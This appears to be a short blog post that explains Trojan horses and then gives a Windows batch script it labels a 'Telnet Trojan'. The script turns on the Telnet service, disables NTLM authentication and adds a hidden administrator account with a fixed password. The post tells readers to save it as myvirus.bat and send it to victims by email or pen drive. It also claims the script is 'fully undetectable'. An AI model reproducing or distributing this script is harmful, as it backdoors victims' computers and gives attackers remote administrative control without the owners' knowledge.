Trojan horse is also a type of virus which is used to control remote machine without system
owner knowledge. Trojan has two parts : 1. server 2. client , Server handles all infected remote
computers' connections and client is used to infect victim computer system. Every Trojan has its
associated port number for communication over internet or LAN.
Telnet Trojan Target : All windows XP machines.
Features: Fully undetectable for all antiviruses.
----------------------------------------------------------------------- ----------------------------------------------
echo off
sc config TlntSvr start= auto
sc start TlntSvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user rdxentre /add
net user rdxentre rdx123
net localgroup administrators rdxentre /add
exit
Write the above code in the notepad and save as myvirus.bat and send it through email, pen
drive, etc to other system for remote control.
0 comments:
Post a Comment